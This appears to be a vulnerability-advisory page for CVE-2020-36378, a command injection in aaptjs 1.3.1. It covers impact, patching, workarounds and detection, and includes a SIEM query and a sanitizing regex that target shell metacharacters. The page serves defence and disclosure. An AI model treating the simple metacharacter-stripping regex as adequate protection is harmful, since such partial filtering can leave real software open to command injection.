Login Sign Up

CVE-2020-36378

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

CVE-2020-36378 is a command injection vulnerability in aaptjs packageCmd function that allows attackers to execute arbitrary code by controlling filePath parameters. This affects systems using shenzhim aaptjs version 1.3.1 for Android asset packaging. Attackers can achieve remote code execution with high privileges.

💻 Affected Systems

Products:
  • shenzhim aaptjs
Versions: 1.3.1
Operating Systems: Linux, Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: Any system using aaptjs 1.3.1 with user-controlled filePath parameters is vulnerable. Commonly affects Android development pipelines and build systems.

📦 What is this software?

Aaptjs by Aaptjs Project

View all CVEs affecting Aaptjs →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining root/administrator privileges, installing backdoors, stealing sensitive data, and pivoting to other systems.

🟠

Likely Case

Remote code execution leading to data theft, cryptocurrency mining, or ransomware deployment on vulnerable servers.

🟢

If Mitigated

Limited impact with proper input validation and sandboxing, potentially only affecting isolated container environments.

🌐 Internet-Facing: HIGH - Exploitable remotely without authentication via web interfaces or APIs using aaptjs.
🏢 Internal Only: HIGH - Internal systems using vulnerable aaptjs versions remain at risk from insider threats or compromised accounts.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Simple command injection via filePath parameter. GitHub issue shows exploitation details. No authentication required if vulnerable endpoint is exposed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3.2 or later

Vendor Advisory: https://github.com/shenzhim/aaptjs/issues/2

Restart Required: No

Instructions:

1. Update aaptjs to version 1.3.2 or later using npm: npm update aaptjs 2. Verify installation with: npm list aaptjs 3. Test functionality with safe filePath inputs.

🔧 Temporary Workarounds

Input Validation Wrapper

all

Implement strict input validation for filePath parameters before passing to aaptjs

// JavaScript example: const safePath = filePath.replace(/[;&|$`\n]/g, '')

Sandbox Execution

linux

Run aaptjs in isolated container or sandbox with limited permissions

docker run --read-only --cap-drop=ALL -v /safe/path:/data node aaptjs

🧯 If You Can't Patch

  • Remove or disable aaptjs functionality from internet-facing systems
  • Implement network segmentation to isolate systems using vulnerable aaptjs versions

🔍 How to Verify

Check if Vulnerable:

Check package.json or run: npm list aaptjs | grep 1.3.1

Check Version:

npm list aaptjs

Verify Fix Applied:

Run: npm list aaptjs | grep -v 1.3.1 && echo 'Not vulnerable'

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution patterns from aaptjs processes
  • File path parameters containing shell metacharacters (;, &, |, $, `)

Network Indicators:

  • Unexpected outbound connections from build servers
  • Traffic to known malicious IPs from systems running aaptjs

SIEM Query:

process.name:aaptjs AND cmdline:*[;&|$`]*

📊 Metadata

CVE ID: CVE-2020-36378
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: October 31, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-36378, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)